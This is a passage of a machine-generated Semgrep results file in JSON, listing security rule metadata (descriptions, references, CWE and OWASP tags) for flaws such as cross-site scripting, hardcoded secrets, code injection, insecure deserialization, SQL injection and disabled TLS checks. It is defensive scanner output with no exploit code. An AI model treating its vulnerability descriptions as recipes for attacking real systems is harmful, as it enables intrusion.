HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data."},"help":{"markdown":"Detected user input flowing into an HTML response. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.security.tainted-html-response.tainted-html-response)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected user input flowing into an HTML response. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.security.tainted-html-response.tainted-html-response","id":"python.aws-lambda.security.tainted-html-response.tainted-html-response","name":"python.aws-lambda.security.tainted-html-response.tainted-html-response","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.security.tainted-html-response.tainted-html-response"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Heroku API Key detected"},"help":{"markdown":"Heroku API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Heroku API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key","id":"generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key","name":"generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret","id":"kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret","name":"kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret","id":"kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret","name":"kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"When using `System.Text.RegularExpressions` to process untrusted input, pass a timeout. A malicious user can provide input to `RegularExpressions` that abuses the backtracking behaviour of this regular expression engine. This will lead to excessive CPU usage, causing a Denial-of-Service attack"},"help":{"markdown":"When using `System.Text.RegularExpressions` to process untrusted input, pass a timeout. A malicious user can provide input to `RegularExpressions` that abuses the backtracking behaviour of this regular expression engine. This will lead to excessive CPU usage, causing a Denial-of-Service attack\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n - [https://docs.microsoft.com/en-us/dotnet/standard/base-types/regular-expressions#regular-expression-examples](https://docs.microsoft.com/en-us/dotnet/standard/base-types/regular-expressions#regular-expression-examples)\n","text":"When using `System.Text.RegularExpressions` to process untrusted input, pass a timeout. A malicious user can provide input to `RegularExpressions` that abuses the backtracking behaviour of this regular expression engine. This will lead to excessive CPU usage, causing a Denial-of-Service attack"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos","id":"csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos","name":"csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.code.vm2-express.vm2-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/javascript.express.code.vm2-express.vm2-express","id":"javascript.express.code.vm2-express.vm2-express","name":"javascript.express.code.vm2-express.vm2-express","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.code.vm2-express.vm2-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Hardcoded salt is used in cryptographic operations, which can result in major security issues. Use salt generator that is provided by bcrypt - `bcrypt.gensalt()`."},"help":{"markdown":"Hardcoded salt is used in cryptographic operations, which can result in major security issues. Use salt generator that is provided by bcrypt - `bcrypt.gensalt()`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt)\n - [https://cryptography.io/en/latest/random-numbers/#random-number-generation](https://cryptography.io/en/latest/random-numbers/#random-number-generation)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Hardcoded salt is used in cryptographic operations, which can result in major security issues. Use salt generator that is provided by bcrypt - `bcrypt.gensalt()`."},"helpUri":"https://semgrep.dev/r/python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt","id":"python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt","name":"python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' is running in privileged mode. This grants the container the equivalent of root capabilities on the host machine. This can lead to container escapes, privilege escalation, and other security concerns. Remove the 'privileged' key to disable this capability."},"help":{"markdown":"Service '$SERVICE' is running in privileged mode. This grants the container the equivalent of root capabilities on the host machine. This can lead to container escapes, privilege escalation, and other security concerns. Remove the 'privileged' key to disable this capability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.privileged-service.privileged-service)\n - [https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html](https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html)\n - [https://containerjournal.com/topics/container-security/why-running-a-privileged-container-is-not-a-good-idea/](https://containerjournal.com/topics/container-security/why-running-a-privileged-container-is-not-a-good-idea/)\n","text":"Service '$SERVICE' is running in privileged mode. This grants the container the equivalent of root capabilities on the host machine. This can lead to container escapes, privilege escalation, and other security concerns. Remove the 'privileged' key to disable this capability."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.privileged-service.privileged-service","id":"yaml.docker-compose.security.privileged-service.privileged-service","name":"yaml.docker-compose.security.privileged-service.privileged-service","properties":{"precision":"very-high","tags":["CWE-250: Execution with Unnecessary Privileges","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.privileged-service.privileged-service"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret","id":"kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret","name":"kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.web.django-cookie-samesite-none.django-cookie-samesite-none)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"helpUri":"https://semgrep.dev/r/python.django.web.django-cookie-samesite-none.django-cookie-samesite-none","id":"python.django.web.django-cookie-samesite-none.django-cookie-samesite-none","name":"python.django.web.django-cookie-samesite-none.django-cookie-samesite-none","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.web.django-cookie-samesite-none.django-cookie-samesite-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Depending on the context, user control data in `Object.assign` can cause web response to include data that it should not have or can lead to a mass assignment vulnerability."},"help":{"markdown":"Depending on the context, user control data in `Object.assign` can cause web response to include data that it should not have or can lead to a mass assignment vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.insecure-object-assign.insecure-object-assign)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)\n - [https://en.wikipedia.org/wiki/Mass_assignment_vulnerability](https://en.wikipedia.org/wiki/Mass_assignment_vulnerability)\n","text":"Depending on the context, user control data in `Object.assign` can cause web response to include data that it should not have or can lead to a mass assignment vulnerability."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.insecure-object-assign.insecure-object-assign","id":"javascript.lang.security.insecure-object-assign.insecure-object-assign","name":"javascript.lang.security.insecure-object-assign.insecure-object-assign","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.insecure-object-assign.insecure-object-assign"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://docs.python.org/3/library/json.html](https://docs.python.org/3/library/json.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"helpUri":"https://semgrep.dev/r/python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid","id":"python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid","name":"python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a Storage that was not configured to deny action by default. Add `default_action = \"Deny\"` in your resource block."},"help":{"markdown":"Detected a Storage that was not configured to deny action by default. Add `default_action = \"Deny\"` in your resource block.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account_network_rules#default_action](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account_network_rules#default_action)\n - [https://docs.microsoft.com/en-us/azure/firewall/rule-processing](https://docs.microsoft.com/en-us/azure/firewall/rule-processing)\n","text":"Detected a Storage that was not configured to deny action by default. Add `default_action = \"Deny\"` in your resource block."},"helpUri":"https://semgrep.dev/r/terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny","id":"terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny","name":"terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny","properties":{"precision":"very-high","tags":["CWE-16: CWE CATEGORY: Configuration","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli","id":"java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli","name":"java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS SSM logs are unencrypted or disabled. Please enable logs and use AWS KMS encryption key to protect SSM logs. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"help":{"markdown":"The AWS SSM logs are unencrypted or disabled. Please enable logs and use AWS KMS encryption key to protect SSM logs. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS SSM logs are unencrypted or disabled. Please enable logs and use AWS KMS encryption key to protect SSM logs. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues","id":"terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues","name":"terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A specially crafted calldata may be used to impersonate other accounts"},"help":{"markdown":"A specially crafted calldata may be used to impersonate other accounts\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.superfluid-ctx-injection.superfluid-ctx-injection)\n - [https://rekt.news/superfluid-rekt/](https://rekt.news/superfluid-rekt/)\n - [https://medium.com/superfluid-blog/08-02-22-exploit-post-mortem-15ff9c97cdd](https://medium.com/superfluid-blog/08-02-22-exploit-post-mortem-15ff9c97cdd)\n - [https://polygonscan.com/address/0x07711bb6dfbc99a1df1f2d7f57545a67519941e7](https://polygonscan.com/address/0x07711bb6dfbc99a1df1f2d7f57545a67519941e7)\n","text":"A specially crafted calldata may be used to impersonate other accounts"},"helpUri":"https://semgrep.dev/r/solidity.security.superfluid-ctx-injection.superfluid-ctx-injection","id":"solidity.security.superfluid-ctx-injection.superfluid-ctx-injection","name":"solidity.security.superfluid-ctx-injection.superfluid-ctx-injection","properties":{"precision":"very-high","tags":["CWE-20: Improper Input Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.superfluid-ctx-injection.superfluid-ctx-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for setting the environment variable NODE_TLS_REJECT_UNAUTHORIZED to 0, which disables TLS verification. This should only be used for debugging purposes. Setting the option rejectUnauthorized to false bypasses verification against the list of trusted CAs, which also leads to insecure transport. These options lead to vulnerability to MTM attacks, and should not be used."},"help":{"markdown":"Checks for setting the environment variable NODE_TLS_REJECT_UNAUTHORIZED to 0, which disables TLS verification. This should only be used for debugging purposes. Setting the option rejectUnauthorized to false bypasses verification against the list of trusted CAs, which also leads to insecure transport. These options lead to vulnerability to MTM attacks, and should not be used.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification)\n - [https://nodejs.org/api/https.html#https_https_request_options_callback](https://nodejs.org/api/https.html#https_https_request_options_callback)\n - [https://stackoverflow.com/questions/20433287/node-js-request-cert-has-expired#answer-29397100](https://stackoverflow.com/questions/20433287/node-js-request-cert-has-expired#answer-29397100)\n","text":"Checks for setting the environment variable NODE_TLS_REJECT_UNAUTHORIZED to 0, which disables TLS verification. This should only be used for debugging purposes. Setting the option rejectUnauthorized to false bypasses verification against the list of trusted CAs, which also leads to insecure transport. These options lead to vulnerability to MTM attacks, and should not be used."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification","id":"problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification","name":"problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret","id":"javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret","name":"javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n 